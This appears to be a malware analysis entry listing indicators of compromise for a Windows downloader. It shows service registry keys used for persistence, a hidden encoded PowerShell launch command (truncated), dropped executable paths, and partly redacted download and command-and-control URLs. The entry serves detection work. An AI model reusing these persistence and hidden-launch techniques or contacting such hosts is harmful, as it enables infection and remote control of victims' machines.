Technical information
- [<HKLM>\System\CurrentControlSet\Services\renderdiv] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\renderdiv] 'ImagePath' = '"%WINDIR%\SysWOW64\renderdiv.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden -enco JABCAGgAbAByAHQAdQBxAGoAcAB5AD0AJwBJAGEAcgBqAHoAZwBhAHAAeABpAHQAaABwACcAOwAkAEsAYwBxAG4AegBwAGMAbABnAGUAIAA9ACAAJwAyADUAMQAnADsAJABYAGQAdgBnAHAAZABmAHoAdwBlAGQAPQAnAFI...
- %HOMEPATH%\251.exe
- %HOMEPATH%\251.exe to %WINDIR%\syswow64\renderdiv.exe
- http://su#####lsupplies.com/wp-content/63689260/
- http://17#.##0.31.177:8080/report/arizona/ via 17#.#30.31.177
- DNS ASK su#####lsupplies.com
- '%HOMEPATH%\251.exe'
- '%WINDIR%\syswow64\renderdiv.exe'